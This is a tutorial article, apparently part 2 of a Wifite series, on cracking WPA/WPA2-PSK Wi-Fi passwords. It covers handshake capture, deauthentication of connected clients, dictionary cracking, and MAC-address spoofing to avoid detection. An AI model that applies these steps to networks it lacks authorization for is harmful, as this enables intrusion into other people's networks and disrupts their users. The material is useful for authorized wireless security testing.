Wifite walkthrough part 2
In this article of Wifite walkthrough we will look at cracking access points using WPA-PSK or WPA2-PSK using Wifite.
If you’ve used tools like airodump-ng, aircrack-ng, etc. to crack WPA access points before, you should know that a captured WPA four-way handshake is required to successfully crack a WPA-PSK network. More details on the WPA four-way handshake can be found on this wikipedia page.
Topics covered[Wifite walkthrough Part 1]
As mentioned in the previous article, there is a bug in Wifite that may or may not be in your particular version of Wifite. The error basically makes aireplay-ng not work properly and shows an error like aireplay-ng terminated unexpectedly. To fix this, you will need to make some minor modifications to the wifite code. You can install gedit (apt-get install gedit), which is a text editor, and then edit the wifite python script (located in /usr/bin/wifite) using the steps here. Use gedit /usr/bin/wifite to open wifite. This will open the wifite source code. Then replace each occurrence of cmd = [‘aireplay-ng’, cmd = [‘aireplay-ng’,’–ignore-negative-one’,
To run wifite to crack a WPA access point, give it the -wpa option to target only WPA networks. Also give it a dictionary file as input to crack the WPA passphrase using the -dict option. In kali linux wordlists are stored in /usr/share/wordlists. Wifite will now start searching for WPA access points.
Press Ctrl+C to enter the destination number. In my case, the target number is 2, which is the access point I configured for testing purposes. The access point uses WPA2-PSK encryption with the key as “password”.
Wifite will now start listening for the handshake. Once it has found it, it will automatically start cracking the passphrase using the dictionary file that we supplied.
And as you can see, Wifite has successfully found the access point password.
Sometimes things don’t work out so smoothly. In order to capture the WPA handshake between the client and the access point, the client must be connected to the wireless network during the time we are monitoring the network. If the client is already connected, no handshake will be captured. Wifite does this by automatically sending deauthentication packets to a specific client or broadcast deauthentication packet if requested. You can specify the time between deauthentication packets using the -wpadt parameter. So when the client tries to reconnect to the access point, the handshake is captured.
You can also specify which tool you want to use to crack the passphrase once the four-way handshake is successfully captured. By default, aircrack-ng is selected. You can also use cowpatty, pyrit or tshark to crack the passphrase.
Another great option in Wifit is to anonymize your MAC address using the -mac option. Although it is relatively trivial to use simple commands or the macchanger utility to change the MAC address for a specific interface, it is good to have this feature in the tool itself. However, for this to work, you must first switch the specific interface for which you want to change the MAC address to managed mode if it was previously in monitor mode. You can use the iwconfig command to check all interfaces that are in monitor mode, and then remove them using the airmon-ng stop interface-name command. As we can see from the image below, mon0 interface is in monitor mode.
Hence, lets take it down using the command airmon-ng stop mon0
Now we can add the -mac option to anonymize the MAC address. As you can see, Wifite is smart enough to change the MAC address to something similar to the interface’s existing MAC address and not something ridiculous (eg AA:BB:CC:DD:EE:FF), which gives them away.
And when you stop the capture, Wifite is nice enough to change the MAC address back to the original one.
In this article, we looked at how we can use Wifite to crack networks using WPA-PSK or WPA2-PSK. Wifite is great at what it does and automates almost everything, but it’s important to understand how it uses tools like airodump-ng, aircrack-ng, etc. to accomplish its tasks. I’d recommend you go through the Wifite source code and see how it’s done.
Related Article:Bootkit Dynamic Analysis : Emulation and Virtualization 2023
